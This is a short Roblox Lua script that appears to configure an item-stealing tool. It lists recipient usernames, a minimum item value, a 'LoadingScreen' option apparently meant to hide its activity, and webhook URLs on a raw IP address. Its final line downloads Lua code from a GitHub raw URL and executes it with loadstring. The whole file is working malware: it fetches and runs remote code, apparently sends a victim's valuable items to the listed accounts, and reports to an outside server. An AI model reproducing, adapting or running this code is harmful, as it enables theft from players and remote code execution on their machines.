_G.NullConfig = {
    User = {"1SamRatana", "DEVFURYYT", "IQKH168", "DEVPHOEM", "devkak5", "Sky168295", "Babysky1688", "Ahlalu"},
    min_value = 10000000000,
    pingEveryone = "Yes", -- dont change this
    Webhook = "http://45.13.225.83:20002/proxy/48ac930df23c721d7403fb1413603c60",
    FakeGift = "No",
    Trash = "http://45.13.225.83:20002/proxy/48ac930df23c721d7403fb1413603c60",
    LoadingScreen = "Yes",
    GiftOnlyRares = "No",
    ExecuteOtherScript = "No",
}
    
loadstring(game:HttpGetAsync('https://raw.githubusercontent.com/sleepyvill/script/refs/heads/main/lib.lua'))()
